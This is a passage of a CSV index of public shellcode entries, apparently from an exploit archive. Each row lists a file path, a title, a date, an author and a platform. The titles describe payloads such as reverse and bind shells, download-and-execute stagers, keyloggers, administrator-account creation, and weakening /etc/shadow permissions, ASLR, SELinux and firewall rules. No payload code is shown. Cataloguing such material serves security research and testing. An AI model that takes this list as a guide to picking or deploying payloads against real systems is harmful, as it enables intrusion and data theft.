bytes)",2013-11-04,"Jacob Holcomb",linux_mips,shellcode, -40352,shellcodes/win_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode, -33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode, -34060,shellcodes/lin_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode, -34262,shellcodes/lin_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode, -34592,shellcodes/lin_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode, -34667,shellcodes/lin_x86-64/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode, -34778,shellcodes/lin_x86/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode, -35205,shellcodes/lin_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode, -35519,shellcodes/lin_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode, -35586,shellcodes/lin_x86-64/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode, -35587,shellcodes/lin_x86-64/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode, -35793,shellcodes/win_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode, -35794,shellcodes/win_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode, -35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode, -36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",generator,shellcode, -36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode, -36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode, -36359,shellcodes/lin_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode, -36391,shellcodes/lin_x86/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode, -36393,shellcodes/lin_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode, -36394,shellcodes/lin_x86/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode, -36395,shellcodes/lin_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode, -36397,shellcodes/lin_x86/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode, -36398,shellcodes/lin_x86/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode, -36637,shellcodes/lin_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode, -36672,shellcodes/lin_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode, -36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",generator,shellcode, -36701,shellcodes/lin_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode, -36750,shellcodes/lin_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode, -36778,shellcodes/lin_x86/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode, -36779,shellcodes/win_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode, -36780,shellcodes/win_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode, -36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",generator,shellcode, -36857,shellcodes/lin_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode, -36858,shellcodes/lin_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode, -36921,shellcodes/lin_x86/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode, -36908,shellcodes/lin_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode, -37069,shellcodes/lin_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode, -37251,shellcodes/lin_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,lin_x86,shellcode, -37285,shellcodes/lin_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode, -37289,shellcodes/lin_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode, -37297,shellcodes/lin_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode, -37358,shellcodes/lin_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode, -37359,shellcodes/lin_x86/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode, -37362,shellcodes/lin_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode, -37365,shellcodes/lin_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,lin_x86,shellcode, -37366,shellcodes/lin_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode, -37384,shellcodes/lin_x86/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode, -37390,shellcodes/lin_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode, -37391,shellcodes/lin_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode, -37392,shellcodes/lin_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode, -37393,shellcodes/lin_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode, -37401,shellcodes/lin_x86-64/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode, -37495,shellcodes/lin_x86/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode, -37664,shellcodes/win_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode, -37749,shellcodes/lin_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode, -37758,shellcodes/win_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode, -37762,shellcodes/lin_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode, -37895,shellcodes/win_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode, -38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode, -38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode, -38088,shellcodes/lin_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode, -38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",generator,shellcode, -38116,shellcodes/lin_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode, -38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode, -38150,shellcodes/lin_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode, -38194,shellcodes/android/38194.c,"Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode, -38239,shellcodes/lin_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode, -38469,shellcodes/lin_x86-64/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode, -38708,shellcodes/lin_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode, -38815,shellcodes/lin_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode, -38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,generator,shellcode, -39149,shellcodes/lin_x86-64/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode, -39152,shellcodes/lin_x86-64/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode, -39160,shellcodes/lin_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode, -39185,shellcodes/lin_x86-64/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode, -39203,shellcodes/lin_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode, -39204,shellcodes/lin_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode, -39312,shellcodes/lin_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode, -39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode, -39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode, -39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode, -39383,shellcodes/lin_x86-64/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode, -39388,shellcodes/lin_x86-64/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode, -39389,shellcodes/lin_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode, -39390,shellcodes/lin_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode, -39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode, -39519,shellcodes/win_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode, -39578,shellcodes/lin_x86-64/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode, -39617,shellcodes/lin_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode, -39624,shellcodes/lin_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode, -39625,shellcodes/lin_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode, -39684,shellcodes/lin_x86-64/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode, -39700,shellcodes/lin_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode, -39718,shellcodes/lin_x86-64/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode, -40094,shellcodes/win_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode, -39722,shellcodes/lin_x86/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode, -39723,shellcodes/lin_x86/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode, -39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode, -39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,windows,shellcode, -39754,shellcodes/win_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode, -39758,shellcodes/lin_x86-64/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode, -39763,shellcodes/lin_x86-64/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode, -39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,windows,shellcode, -39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,generator,shellcode, -39847,shellcodes/lin_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode, -39851,shellcodes/lin_x86/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode, -39869,shellcodes/lin_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode, -39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode, -39900,shellcodes/win_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",win_x86,shellcode, -39901,shellcodes/lin_x86/39901.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode, -39914,shellcodes/win_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",win_x86,shellcode, -39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode, -40005,shellcodes/win_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode, -40026,shellcodes/lin_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode, -40029,shellcodes/lin_x86-64/40029.c,"Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode, -40052,shellcodes/lin_x86-64/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode, -40056,shellcodes/lin_x86/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode, -40061,shellcodes/lin_x86-64/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode, -40075,shellcodes/lin_x86/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode, -40079,shellcodes/lin_x86-64/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode, -40110,shellcodes/lin_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode, -40122,shellcodes/lin_x86-64/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode, -40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode, -40131,shellcodes/lin_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode, -40139,shellcodes/lin_x86-64/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode, -40175,shellcodes/win_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode, -40179,shellcodes/lin_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode, -40222,shellcodes/lin_x86/40222.c,"Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode, -40223,shellcodes/lin_x86/40223.c,"Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode, -40245,shellcodes/win_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode, -40246,shellcodes/win_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode, -40259,shellcodes/win_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode, -40549,shellcodes/win_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode, -40560,shellcodes/win_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode, -40781,shellcodes/win_x86-64/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode, -40808,shellcodes/lin_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode, -40821,shellcodes/win_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode, -40872,shellcodes/lin_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode, -40924,shellcodes/lin_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode, -40981,shellcodes/win_x86-64/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode, -41072,shellcodes/win_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode, -41089,shellcodes/lin_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode, -41128,shellcodes/lin_x86-64/41128.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode, -41174,shellcodes/lin_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode, -41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode, -41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,generator,shellcode, -41282,shellcodes/lin_x86/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode, -41375,shellcodes/linux/41375.c,"Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode, -41381,shellcodes/win_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode, -41398,shellcodes/lin_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode, -41403,shellcodes/lin_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode, -41439,shellcodes/lin_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode, -41467,shellcodes/win_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode, -41468,shellcodes/lin_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode, -41477,shellcodes/lin_x86-64/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode, -41481,shellcodes/win_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode, -41498,shellcodes/lin_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode, -41503,shellcodes/lin_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode, -41509,shellcodes/lin_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 